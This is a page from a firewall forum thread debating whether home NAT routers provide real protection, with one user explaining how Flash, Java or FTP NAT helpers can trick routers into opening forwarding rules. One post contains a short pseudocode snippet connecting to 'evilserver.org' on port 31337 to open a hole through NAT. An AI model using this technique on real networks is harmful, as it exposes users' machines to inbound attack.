Adobe Flash Updater accessed internet....but how? - Firewalls

This is a discussion on Adobe Flash Updater accessed internet....but how? - Firewalls ; "Sebastian G." writes: > Todd H. wrote: > > > > So I guess then Buffalo branded devices will soon have your stamp of > > approval and soften you from the "home nat routers are worthless" > > stance? ...

+ Reply to Thread
Page 2 of 2 FirstFirst 1 2
Results 21 to 23 of 23

Thread: Adobe Flash Updater accessed internet....but how?

  1. Re: Adobe Flash Updater accessed internet....but how?

    "Sebastian G." writes:

    > Todd H. wrote:
    >
    >
    > > So I guess then Buffalo branded devices will soon have your stamp of
    > > approval and soften you from the "home nat routers are worthless"
    > > stance?

    >
    >
    > No. The problem with NAT is that there're multiple ways to influence
    > client applications to trigger forwarding rules. Just take a look at
    > Flash and Java, not mentioning VoIP applications...


    Patch (authentication bypass holes that have befallen Linksys in the
    past) and disable the inanity of uPNP and we're done with that
    though.

    Or do you have something else in mind?

    > > No one cares about the purity of the NAT definition - so long as
    > > unsolicited inbound network traffic is reliably blocked, what does
    > > it matter?

    >
    > Because it creates connectivity problems?
    > Because your proclaimed reliable doesn't exist, by design?
    > Because such a blockade is pretty superfluos?


    Like hundreds of thousands of people, I use one of these classes of
    boxes. What connectivity problems?

    How do you posit that inbound blocking on a nat router is any more
    superfluous than the Windows Firewall software that you do seem to
    like?

    > > This also paints with a pretty broad brush. Has nyone published
    > > anything on say, the oft-recommended Linksys WRT54G about such issues?

    >
    > Yes, see . Please
    > denote that this is not a problem of the implementation, but the
    > configuration: If the interface would allow proper low-level access to
    > netfilter/iptables instead of the limited front-end, one could
    > properly take the FTP NAT helper into account (or even deactivate it).


    Interesting. Wish the test description weren't in German though.
    Is there a BID on this vuln? Or basically, I'm now curious what this
    test was.

    Best Regards,
    --
    Todd H.
    http://www.toddh.net/

  2. Re: Adobe Flash Updater accessed internet....but how?

    Todd H. wrote:

    > "Sebastian G." writes:
    >
    >> Todd H. wrote:
    >>
    >>
    >>> So I guess then Buffalo branded devices will soon have your stamp of
    >>> approval and soften you from the "home nat routers are worthless"
    >>> stance?

    >>
    >> No. The problem with NAT is that there're multiple ways to influence
    >> client applications to trigger forwarding rules. Just take a look at
    >> Flash and Java, not mentioning VoIP applications...

    >
    > Patch (authentication bypass holes that have befallen Linksys in the
    > past) and disable the inanity of uPNP and we're done with that
    > though.
    >
    > Or do you have something else in mind?



    XMLSocket foo = new XMLSocket("evilserver.org",31337);
    foo.setLocalPort(135);
    XMLRequest bar = new XMlRequest("whatever");
    foo.sendrequest(bar);

    There's nothing exploited, it's just the way NAT works.

    Or, even simpler:



    Nothing exploited, that's just how FTP NAT helpers work.

    > Like hundreds of thousands of people, I use one of these classes of
    > boxes. What connectivity problems?



    Aside from even the simplest load balancing breaking? Just take any
    sufficiently complex protocol, f.e. various P2P protocols, various computer
    games, VoIP applications...

    > How do you posit that inbound blocking on a nat router is any more
    > superfluous than the Windows Firewall software that you do seem to
    > like?



    I don't have too, since this is solely your claim so far.

    > Interesting. Wish the test description weren't in German though.
    > Is there a BID on this vuln? Or basically, I'm now curious what this
    > test was.



    It's basically a Java or Flash applet acting as a FTP client, using the PORT
    command, the FTP NAT helper parsing the command and adding an appropriate
    NAT table entry. There's nothing wrong with this, it justs void some false
    security assumptions about NAT.

  3. Re: Adobe Flash Updater accessed internet....but how?


    just as information. Sebastian G. here is not Sebastian Gottschall
    (BrainSlayer), even if he seems to live in the same town or area.
    but i found out that 2 persons with the same name are living here, if i
    look at the student list here at the university

    thx,
    Sebastian Gottschall


    --
    BrainSlayer
    ------------------------------------------------------------------------
    BrainSlayer's Profile: http://forums.techarena.in/member.php?u=52513
    View this thread: http://forums.techarena.in/showthread.php?t=913471

    http://forums.techarena.in


+ Reply to Thread
Page 2 of 2 FirstFirst 1 2